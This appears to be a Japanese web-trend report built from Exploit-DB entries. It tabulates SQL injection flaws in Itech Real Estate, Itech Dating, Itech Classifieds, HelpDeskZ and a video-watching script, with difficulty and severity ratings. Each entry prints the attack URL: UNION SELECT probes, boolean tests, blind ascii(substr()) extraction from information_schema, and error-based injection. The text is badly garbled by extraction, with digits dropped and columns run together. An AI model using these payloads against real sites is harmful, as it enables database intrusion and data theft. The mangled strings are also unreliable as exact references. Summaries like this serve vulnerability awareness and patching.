11 最新 Web トレンドレポート (07.0) ~07.0. Exploit-DB( より公開されている内容に基づいたトレンド情報です 日付 EDB 番号カテゴリ攻撃難度危険度名攻撃コード対象プログラム対象環境 SQL Injection 中高 /search_property.php?property_for=%0union%0all%0 SELECT%0NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT( Itech Real Estate. - 0x776707a7,0x65546e587a4d65446c b7a784d6 search_property.php SQL Injection f56f4486d76f a6d4,0x7 7866b7)-- Itech Real Estate Itech Real Estate SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 中 高 /channels.php?uid=%0and%0=-- channels.php SQL Itech Real Estate. - /agent_search_property.php?id=%0and%0=-- agent_search_property.php SQL Itech Dating.6 - /send_gift.php?id=%0and%0=-- send_gift.php SQL Itech Classifieds /message.php?pid=%0and%0=-- message.php SQL HelpDeskZ <.0. - / SQL Injection /?v=view_tickets&action=ticket&param[]="+ticket_id+"&param []=attachment&param[]=&param[]= or = and ascii(substr((select table_name from information_schema.columns where table_name like '%staff' limit 0,) Itech Real Estate Itech Dating Itech Classifieds HelpDeskZ 4.94 Itech Real Estate. Itech Dating.6 Itech Classifieds 7.7 HelpDeskZ < SQL Injection 難早急対応要 watchvideo.php SQL /watch-video.php?v=67d8ab' AND (SELECT 680 FROM(SELECT COUNT(*),CONCAT(0x776677,(SELECT (ELT(680=680,))),0x7786b77,FLOOR(RAND(0)*))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)